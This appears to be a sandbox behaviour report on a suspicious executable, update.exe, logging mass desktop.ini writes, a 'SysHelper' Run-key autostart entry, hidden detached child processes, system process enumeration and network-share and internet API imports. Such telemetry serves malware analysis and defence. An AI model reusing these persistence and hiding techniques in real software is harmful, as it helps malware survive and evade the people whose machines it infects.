Write	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\desktop.ini	size = 402	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\desktop.ini	size = 80	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Links\desktop.ini	size = 580	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Music\desktop.ini	size = 504	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\desktop.ini	size = 504	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games\desktop.ini	size = 282	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\desktop.ini	size = 524	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\desktop.ini	size = 504	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini	size = 612	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	size = 442	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	size = 370	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	size = 1854	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	size = 1338	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	size = 343	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	size = 216	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	size = 1958	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	size = 1130	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini	size = 520	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	size = 606	1	Fn Data
Write	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	size = 174	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\1NBUR4HR\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\6ASVN7J7\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\D68G7BIJ\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\KQMHSVKD\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	size = 174	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\History\desktop.ini	size = 145	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	size = 145	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	size = 67	1	Fn Data
Write	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	size = 645	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	size = 146	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	size = 211	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	size = 274	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	size = 432	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	size = 558	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	size = 174	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	size = 704	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	size = 678	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	size = 738	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	size = 174	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	size = 476	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	size = 318	1	Fn Data
Write	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	size = 174	1	Fn Data
Write	C:\Users\Default\Contacts\desktop.ini	size = 412	1	Fn Data
Write	C:\Users\Default\Desktop\desktop.ini	size = 282	1	Fn Data
Write	C:\Users\Default\Documents\desktop.ini	size = 402	1	Fn Data
Write	C:\Users\Default\Downloads\desktop.ini	size = 282	1	Fn Data
Write	C:\Users\Default\Favorites\desktop.ini	size = 402	1	Fn Data
Write	C:\Users\Default\Favorites\Links\desktop.ini	size = 80	1	Fn Data
Write	C:\Users\Default\Links\desktop.ini	size = 580	1	Fn Data
Write	C:\Users\Default\Music\desktop.ini	size = 504	1	Fn Data
Write	C:\Users\Default\Pictures\desktop.ini	size = 504	1	Fn Data
Write	C:\Users\Default\Saved Games\desktop.ini	size = 282	1	Fn Data
Write	C:\Users\Default\Searches\desktop.ini	size = 524	1	Fn Data
Write	C:\Users\Default\Videos\desktop.ini	size = 504	1	Fn Data
Write	C:\Users\desktop.ini	size = 174	1	Fn Data
For performance reasons, the remaining 2548 entries are omitted. The remaining entries can be found in glog.xml.

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart, type = REG_EXPAND_SZ		1	Fn

Process (988)

Operation	Process	Additional Information	Count	Logfile
Create	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --ForNetRes 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40 IsAutoStart IsNotTask	os_pid = 0x7f8, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Create	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --Service 1676 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40	os_pid = 0x7ac, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\mobsync.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	33	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	3	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	5	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	6	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	3	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	3	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	497	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	375	Fn

Module (296)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x773e0000	2	Fn
Load	RPCRT4.dll	base_address = 0x77150000	1	Fn
Load	MPR.dll	base_address = 0x75380000	1	Fn
Load	WININET.dll	base_address = 0x75bd0000	1	Fn
Load	WINMM.dll	base_address = 0x75340000	1	Fn
Load	SHLWAPI.dll	base_address = 0x76e40000	1	Fn
Load	KERNEL32.dll	base_address = 0x773e0000	1	Fn
Load	USER32.dll	base_address = 0x75e50000	1	Fn
Load	ADVAPI32.dll	base_address = 0x75720000	1	Fn
Load	SHELL32.dll	base_address = 0x75fa0000	1	Fn
Load	ole32.dll	base_address = 0x75810000	1	Fn
Load	OLEAUT32.dll	base_address = 0x77000000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x75320000	1	Fn
Load	WS2_32.dll	base_address = 0x757d0000	1	Fn
Load	DNSAPI.dll	base_address = 0x752c0000	1	Fn
Load	msvcr100.dll	base_address = 0x75200000	1	Fn
Load	Psapi.dll	base_address = 0x770c0000	1	Fn
Load	Shell32.dll	base_address = 0x75fa0000	2	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x773e0000	13	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x773f4f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x773f1252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x773f4208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x773f359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77ad0fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77ac9d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7741735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32First, address_out = 0x77475cd9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x773f1856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x773f435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x773f186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x773f3519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x7740d802	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x77171635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x77191ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x771cd918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x77193fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x7716f48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x75382dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x75382f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x75383058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75bff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75beb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x75bf5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75beab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x75bf9197	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x75c4be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x75c130f1	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x753426e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x76e5a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x76e5bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x76e7ad1a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x76e581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76e53248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x76e4d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x76e545bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x7740f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x774134d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x7747425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x773f3da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x7740ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x773f3c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x773f5223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x773f196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x773f4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x773f17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x773f5a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x773f1b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x773f103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x773f4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x773f1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x773f5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x773f1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x7740ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x773f1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x773f588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x773f5063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x773f170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x773f492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x773f10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x7741830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x773f4620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x7741d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x773f3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x773f3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x77412b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x773f5929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x773f192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x773f1700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x773f11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x773f11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x773f1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x77409af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x773f168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x773f183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7741828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x773f54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x773f1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x773f89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x773f2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x773f3bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x7740cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x773f1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x773fdd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x7740174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x773f4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x773f5558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x773f4c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x773f4467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x773f11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x773f34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x773f53c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x7741d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x77412a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x77474691	1	Fn
